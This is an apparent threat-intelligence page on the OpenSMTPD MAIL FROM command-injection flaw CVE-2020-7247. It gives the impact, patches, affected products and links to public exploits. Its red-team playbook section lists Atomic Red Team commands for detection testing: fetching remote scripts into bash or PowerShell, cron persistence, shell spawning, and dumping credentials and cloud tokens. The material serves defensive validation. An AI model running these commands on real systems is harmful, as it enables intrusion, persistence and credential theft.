CVE-2020-7247
Overview
This vulnerability is a command injection flaw originating from improper input validation in the smtp_mailaddr function within smtp_session.c of OpenSMTPD 6.6. The root cause is an incorrect return value on validation failure, which allows shell metacharacters in the MAIL FROM SMTP command to be processed unsafely. This affects the default uncommented configuration of the OpenSMTPD SMTP server component.
Vulnerability Description
smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
Impact
An unauthenticated remote attacker can execute arbitrary commands with root privileges on the affected system by sending a specially crafted SMTP MAIL FROM command. No user interaction or authentication is required, enabling full system compromise. This can lead to unauthorized data access, system takeover, and disruption of mail services on servers running vulnerable OpenSMTPD versions with default configurations.
Solution
Apply vendor patches as detailed in Debian Security Advisory DSA-4611 and Ubuntu USN-4268-1, which address this vulnerability in OpenSMTPD version 6.6. Fedora users should refer to the Fedora package announcement for updated packages. Refer to the OpenBSD security page and the linked advisories for detailed patch instructions and upgrade to OpenSMTPD versions beyond 6.6.1. Avoid using the default uncommented configuration until patched.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from improper input validation in the handling of SMTP commands within OpenSMTPD, particularly in the smtp_mailaddr function. This flaw allows an attacker to craft a malicious SMTP session that can execute arbitrary commands with root privileges. The core issue stems from the incorrect return value generated upon failure of input validation, which fails to adequately restrict the processing of shell metacharacters in the MAIL FROM field. As a result, attackers can manipulate the SMTP protocol to inject commands that the server will execute, leading to a significant security breach.
Attack vectors for this vulnerability are primarily remote, as the exploitation can occur over the network without requiring physical access to the server. An attacker could initiate a crafted SMTP session targeting the vulnerable OpenSMTPD configuration, particularly those that are left uncommented and thus default to insecure settings. By inserting shell metacharacters into the MAIL FROM field, the attacker can exploit the flawed input validation to execute arbitrary commands on the server. This scenario highlights the ease with which an attacker can leverage this vulnerability, making it a critical concern for organizations relying on OpenSMTPD for email services.
The real-world impact of this vulnerability is profound, especially for organizations that utilize OpenSMTPD in their infrastructure. Successful exploitation can lead to unauthorized access, data breaches, and complete system compromise. The ability to execute commands as root means that an attacker could manipulate system files, install malware, or exfiltrate sensitive data. The potential for operational disruption and reputational damage poses a significant business risk, particularly for organizations handling sensitive information or operating in regulated industries. The high CVSS score of 9.8 underscores the severity of this vulnerability, indicating that it should be prioritized for immediate remediation.
To detect and mitigate this vulnerability, organizations should first ensure that they are using the latest version of OpenSMTPD, as updates typically include security patches that address known vulnerabilities. Regular audits of SMTP configurations are essential to identify any insecure settings that could be exploited. Implementing strict input validation and sanitization measures can also help mitigate the risk, ensuring that any input from users is thoroughly checked before being processed. Additionally, employing intrusion detection systems (IDS) can aid in identifying anomalous SMTP traffic that may indicate an attempted exploitation of this vulnerability. Organizations should also consider implementing network segmentation and access controls to limit the exposure of their email servers to potential attackers.
In conclusion, the vulnerability within OpenSMTPD represents a critical security risk that can have far-reaching consequences for affected organizations. The combination of improper input validation and the potential for remote exploitation necessitates immediate attention from cybersecurity professionals. By adopting robust detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, thereby enhancing their overall security posture and resilience against cyber threats.
CSURFACE threat intelligence has identified a marked escalation in the exploit landscape surrounding CVE-2020-7247. New publicly available proof-of-concept exploits and a Metasploit module have significantly lowered the technical barriers to exploitation, facilitating broader adversary access to remote code execution capabilities against vulnerable OpenSMTPD instances. This development is underscored by the vulnerability’s recent inclusion in the CISA KEV catalog, signaling increased recognition of its criticality within federal and private sector security frameworks. Additionally, the emergence of a high EPSS score reflects a substantial rise in the likelihood of exploitation attempts in the near term. Our telemetry indicates a growing trend of exploit tool adoption, which elevates the operational risk for organizations that have not yet applied mitigations or updated affected software versions. Consequently, the threat level associated with CVE-2020-7247 has shifted from theoretical to imminent, warranting heightened vigilance from defenders monitoring email server environments.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Openbsd | Opensmtpd | 6.6 |
cpe:2.3:a:openbsd:opensmtpd:6.6:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 9.0 |
cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 10.0 |
cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 32 |
cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
|
|
|
Canonical | Ubuntu Linux | 18.04 |
cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
|
|
|
Canonical | Ubuntu Linux | 19.10 |
cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
OpenSMTPD MAIL FROM Remote Code Execution
exploits/unix/smtp/opensmtpd_mail_from_rce
|
Qualys, wvu | Unknown | - | View |
ExploitDB (3)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| OpenSMTPD 6.6.1 - Remote Code Execution | 1F98D | remote | linux | - | View |
| OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit) | Metasploit | remote | linux | - | View |
| OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution | Marco Ivaldi | remote | openbsd | - | View |
GitHub PoCs (10)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
FiroSolutions/cve-2020-7247-exploit
Python exploit of cve-2020-7247
|
FiroSolutions | 25 | 14 | 2020-01-30 | View |
|
QTranspose/CVE-2020-7247-exploit
OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution PoC exploit
|
QTranspose | 11 | 3 | 2021-02-13 | View |
|
superzerosec/cve-2020-7247
OpenSMTPD version 6.6.2 remote code execution exploit
|
superzerosec | 4 | 5 | 2020-02-17 | View |
|
r0lh/CVE-2020-7247
Proof Of Concept Exploit for CVE-2020-7247 (Remote Execution on OpenSMTPD < 6.6.2
|
r0lh | 5 | 1 | 2020-02-18 | View |
|
f4T1H21/CVE-2020-7247
PoC exploit for CVE-2020-7247 OpenSMTPD 6.4.0 < 6.6.1 Remote Code Execution
|
f4T1H21 | 2 | 1 | 2021-06-19 | View |
|
presentdaypresenttime/shai_hulud
Worm written in python, abuses CVE-2020-7247
|
presentdaypresenttime | 2 | 1 | 2022-02-07 | View |
|
SimonSchoeni/CVE-2020-7247-POC
Proof of concept for CVE-2020-7247 for educational purposes.
|
SimonSchoeni | 2 | 0 | 2021-11-26 | View |
|
bytescrappers/CVE-2020-7247
This vulnerability exists in OpenBSD’s mail server OpenSMTPD’s “smtp_mailaddr()” function, and affects OpenBSD version 6...
|
bytescrappers | 0 | 2 | 2021-06-02 | View |
|
minhluannguyen/CVE-2020-7247-reproducer
|
minhluannguyen | 1 | 0 | 2025-03-20 | View |
|
solmin111/OpenSMTPD-CVE-2020-7247-
|
solmin111 | 0 | 0 | 2026-06-28 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
48%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.